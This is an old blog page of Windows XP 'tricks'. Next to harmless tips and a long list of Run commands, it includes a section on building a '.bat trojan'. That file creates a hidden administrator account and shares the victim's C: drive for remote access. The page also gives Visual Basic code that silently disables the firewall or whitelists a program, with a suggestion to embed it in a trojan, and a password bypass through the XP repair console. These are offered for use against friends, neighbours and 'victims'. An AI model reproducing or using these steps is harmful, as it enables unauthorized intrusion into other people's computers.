Friday, February 26, 2010

Hide 'User Accounts' from users..(WinXp tricks)

Go to Start/Run, and type:

GPEDIT.MSC

Open the path

User Config > Admin Templates > Control Panel

doubleclick "Hide specified Control Panel applets"

put a dot in 'enabled', then click 'Show"

click Add button,

type "nusrmgt.cpl" into the add box and click Ok..

now you can't see the User Accounts in the control panel..!

How to remove Windows hidden softwares?(WinXp tricks)

XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file \windows\inf\sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

shortcut..
Start > Run > type "c:\\windows\inf\sysoc.inf" without " " , then delete all worlds "hide" in this file.. (you can find option to find and delete, never change other worlds )

Making your own trojan in a .bat file..(Network hacking tricks..)

Open a dos prompt we will only need a dos prompt , and windows xp...

-..........................Basics........................-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

dir
pause

And now save this as test.bat and execute it.
Funny aint it ?

---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access

Login to Windows Xp without a password(WinXp Tricks..)

Working and Tested..

1. Place your Windows XP CD in your cd-rom and start your computer (it’s assumed here that your XP CD is bootable as it should be - and that you have your bios set to boot from CD)

2. Keep your eye on the screen messages for booting to your cd Typically, it will
be “Press any key to boot from cd”

3. Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.

4. When you get to the Welcome to Setup screen, press ENTER to Setup Windows now

5. The Licensing Agreement comes next - Press F8 to accept it.

6. The next screen is the Setup screen which gives you the option to do a Repair. It should read something like “If one of the following Windows XP installations is damaged, Setup can try to repair it”
Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.

7. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes. 8. Shortly after the Copying Files stage, you will be required to reboot. (this will happen automatically) you will see a progress bar stating “Your computer will reboot in 15 seconds”

9. During the reboot, do not make the mistake of “pressing any key” to boot from
the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.

10. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

11. At the prompt, type NUSRMGR.CPL and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.

12. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you’ve made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).

13. Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password). Your programs and personalized settings should remain intact.


Friday, September 25, 2009

Disable Windows Firewall using Visual Basic (windows security tricks..)

Need to disable the firewall of your neighbor ? And you have physical access to his computer ? Or just want to learn it for fun ? I required disabling the XP firewall for so reason and I was able to do it in one line of code using command prompt to enter registry values. Also, this code disables it,but it doesn't kill it.So that If the person notices, it can be turned back on (most prominent and common viruses today first disable the firewall,so he will not be surprised unless he is a plain dumb). While the following codes disable the firewalls,you can be creative if you can design a simple Trojan and embed this code in it. Experiment and learn.

Please note due to display constraints,the code here may not be displayed as in Visual Basic IDE,It will be wrapped up in several lines like the one given below..but you get the idea..

Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v ""EnableFirewall"" /t REG_DWORD /d ""0"" /f", vbHide


Here is another piece of code that will do it. Instead of disabling it, it allows exceptions to the firewall, and adds a program as an exception.

Public Sub FirewallException(Path As String)

Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v ""DoNotAllowExceptions"" /t REG_DWORD /d ""0"" /f", vbHide

Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v """ & Path & """ /t REG_SZ /d """ & Path & ":*:Enabled:Windows Messanger"" /f", vbHide

End Sub

Put the above code into a module. To use, put this in your code to add itself to the exception list. You can call this code by using this code -

Call FirewallException(App.Path & "\" & App.EXEName & ".exe")


Funny Computer Trick...(internet browser tricks..)

1. Copy and paste the java script code to the address bar of your browser

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)

2: Press enter and watch your window's "shaking it". You can change the value of i if you wish :-)

Run Commands In Windows XP..(windows command)

You can access all these programs by going through START>>RUN or Simply press Windows Key+R
  1. SQL Client Configuration - cliconfg

  2. System Configuration Editor - sysedit

  3. System Configuration Utility - msconfig

  4. System File Checker Utility (Scan Immediately)- sfc /scannow

  5. System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce

  6. System File Checker Utility (Scan On Every Boot) - sfc /scanboot

  7. System File Checker Utility (Return to Default Setting)- sfc /revert

  8. System File Checker Utility (Purge File Cache)- sfc /purgecache

  9. System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x

  1. System Information - msinfo32.

  2. Task Manager – taskmgr

  3. System Properties - sysdm.cpl

  4. Task Manager – taskmgr

  5. TCP Tester - tcptest

  6. Telnet Client - telnet

  7. Tweak UI (if installed) - tweakui

  8. User Account Management- nusrmgr.cpl

  9. Utility Manager - utilman

  10. Windows Address Book - wab

  11. Windows Address Book Import Utility - wabmig

  12. Windows Backup Utility (if installed)- ntbackup

  13. Windows Explorer - explorer

  14. Windows Firewall- firewall.cpl

  15. Windows Magnifier- magnify

  16. Windows Management Infrastructure - wmimgmt.msc

  17. Windows Media Player - wmplayer

  18. Windows Messenger - msmsgs

  19. Windows Picture Import Wizard (need camera connected)- wiaacmgr

  20. Windows System Security Tool – syskey

  21. Windows Update Launches - wupdmgr

  22. Windows Version (to show which version of windows)- winver

  23. Windows XP Tour Wizard - tourstart

  24. Wordpad - write

  25. Password Properties - password.cpl

  26. Performance Monitor - perfmon.msc

  27. Phone and Modem Options - telephon.cpl

  28. Phone Dialer - dialer

  29. Pinball Game - pinball

  30. Power Configuration - powercfg.cpl

  31. Printers and Faxes - control printers

  32. Printers Folder – printers

  33. Private Character Editor - eudcedit

  34. Quicktime (If Installed)- QuickTime.cpl

  35. Real Player (if installed)- realplay

  36. Regional Settings - intl.cpl

  37. Registry Editor - regedit

  38. Registry Editor - regedit32

  39. Remote Access Phonebook - rasphone

  40. Remote Desktop - mstsc

  41. Removable Storage - ntmsmgr.msc

  42. Removable Storage Operator Requests - ntmsoprq.msc

  43. Resultant Set of Policy (XP Prof) - rsop.msc

  44. Scanners and Cameras - sticpl.cpl

  45. Scheduled Tasks - control schedtasks

  46. Security Center - wscui.cpl

  47. Services - services.msc

  48. Shared Folders - fsmgmt.msc

  49. Shuts Down Windows - shutdown

  50. Sounds and Audio - mmsys.cpl

  51. Spider Solitare Card Game - spider

  52. Malicious Software Removal Tool - mrt

  53. Microsoft Access (if installed) - access.cpl

  54. Microsoft Chat - winchat

  55. Microsoft Excel (if installed) - excel

  56. Microsoft Frontpage (if installed)- frontpg

  57. Microsoft Movie Maker - moviemk

  58. Microsoft Paint - mspaint

  59. Microsoft Powerpoint (if installed)- powerpnt

  60. Microsoft Word (if installed)- winword

  61. Microsoft Syncronization Tool - mobsync

  62. Minesweeper Game - winmine

  63. Mouse Properties - control mouse

  64. Mouse Properties - main.cpl

  65. Nero (if installed)- nero

  66. Netmeeting - conf

  67. Network Connections - control netconnections

  68. Network Connections - ncpa.cpl

  69. Network Setup Wizard - netsetup.cpl

  70. Notepad - notepad

  71. Nview Desktop Manager (If Installed)- nvtuicpl.cpl

  72. Object Packager - packager

  73. ODBC Data Source Administrator- odbccp32.cpl

  74. On Screen Keyboard - osk

  75. Opens AC3 Filter (If Installed) - ac3filter.cpl

  76. Outlook Express - msimn

  77. Paint – pbrush

  78. Keyboard Properties - control keyboard

  79. IP Configuration (Display Connection Configuration) - ipconfi/all

  80. IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns

  81. IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns

  82. IP Configuration (Release All Connections)- ipconfig /release

  83. IP Configuration (Renew All Connections)- ipconfig /renew

  84. IP Configuration(RefreshesDHCP&Re-RegistersDNS)-ipconfig/registerdns

  85. IP Configuration (Display DHCP Class ID)- ipconfig/showclassid

  86. IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid

  87. Java Control Panel (If Installed)- jpicpl32.cpl

  88. Java Control Panel (If Installed)- javaws

  89. Local Security Settings - secpol.msc

  90. Local Users and Groups - lusrmgr.msc

  91. Logs You Out Of Windows - logoff.....

  92. Accessibility Controls - access.cpl

  93. Accessibility Wizard - accwiz

  94. Add Hardware - Wizardhdwwiz.cpl

  95. Add/Remove Programs - appwiz.cpl

  96. Administrative Tools control - admintools

  97. Adobe Acrobat (if installed) - acrobat

  98. Adobe Designer (if installed)- acrodist

  99. Adobe Distiller (if installed)- acrodist

  100. Adobe ImageReady (if installed)- imageready

  101. Adobe Photoshop (if installed)- photoshop

  102. Automatic Updates - wuaucpl.cpl

  103. Bluetooth Transfer Wizard – fsquirt

  104. Calculator - calc

  105. Certificate Manager - certmgr.msc

  106. Character Map - charmap

  107. Check Disk Utility - chkdsk

  108. Clipboard Viewer - clipbrd

  109. Command Prompt - cmd

  110. Component Services - dcomcnfg

  111. Computer Management - compmgmt.msc

  112. Control Panel - control

  113. Date and Time Properties - timedate.cpl

  114. DDE Shares - ddeshare

  115. Device Manager - devmgmt.msc

  116. Direct X Control Panel (If Installed)- directx.cpl

  117. Direct X Troubleshooter- dxdiag

  118. Disk Cleanup Utility- cleanmgr

  119. Disk Defragment- dfrg.msc

  120. Disk Management- diskmgmt.msc

  121. Disk Partition Manager- diskpart

  122. Display Properties- control desktop

  123. Display Properties- desk.cpl

  124. Display Properties (w/Appearance Tab Preselected)- control color

  125. Dr. Watson System Troubleshooting Utility- drwtsn32

  126. Driver Verifier Utility- verifier

  127. Event Viewer- eventvwr.msc

  128. Files and Settings Transfer Tool- migwiz

  129. File Signature Verification Tool- sigverif

  130. Findfast- findfast.cpl

  131. Firefox (if installed)- firefox

  132. Folders Properties- control folders

  133. Fonts- control fonts

  134. Fonts Folder- fonts

  135. Free Cell Card Game- freecell

  136. Game Controllers- joy.cpl

  137. Group Policy Editor (XP Prof)- gpedit.msc

  138. Hearts Card Game- mshearts

  139. Help and Support- helpctr

  140. HyperTerminal- hypertrm

  141. Iexpress Wizard- iexpress

  142. Indexing Service- ciadv.msc

  143. Internet Connection Wizard- icwconn1

  144. Internet Explorer- iexplore

  145. Internet Setup Wizard- inetwiz

  146. Internet Properties- inetcpl.cpl